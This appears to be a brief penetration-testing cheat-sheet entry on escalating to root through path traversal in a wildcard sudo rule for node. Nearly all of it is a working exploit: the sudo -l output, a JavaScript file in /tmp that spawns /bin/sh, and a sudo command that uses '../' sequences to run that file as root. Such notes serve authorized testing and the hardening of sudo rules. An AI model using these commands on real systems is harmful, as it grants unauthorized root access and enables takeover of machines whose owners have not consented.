Sudo Path Traversal Privilege Escalation
If some sudo command receives a file path, we might escalate to privileges using path traversal.
sudo -l
(ALL) /usr/bin/node /usr/local/scripts/*.js
Copied!// /tmp/test.js
require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})
Copied!sudo /usr/bin/node /usr/local/scripts/../../../tmp/test.jsLast updated
